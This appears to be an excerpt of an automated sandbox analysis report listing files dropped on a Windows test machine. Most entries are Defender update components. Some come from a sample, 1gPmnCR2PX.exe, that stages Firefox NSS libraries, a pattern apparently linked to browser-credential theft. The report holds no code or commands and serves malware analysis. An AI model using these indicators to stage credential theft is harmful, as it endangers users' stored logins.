Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\te-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\vi-VN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ka-GE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Cyrl-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tr-TR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\mozMapi32.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\et-EE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\lgpllibs.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\da-DK\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hu-HU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fi-FI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sv-SE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pl-PL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mr-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sk-SK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-GB\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lt-LT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSvc.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\vcruntime140.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ca-ES-valencia\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fil-PH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ne-NP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\mozglue.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\da-DK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\el-GR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\softokn3.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ro-RO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bg-BG\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-MX\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-PT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ur-PK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-CA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cs-CZ\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lt-LT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\az-Latn-AZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\am-ET\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tr-TR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\ldif60.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdDevFlt.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Cyrl-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\gl-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\vi-VN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\el-GR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nb-NO\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ga-IE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ca-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-PT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\nssdbm3.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-MX\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpClient.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDetours.dll Jump to dropped file
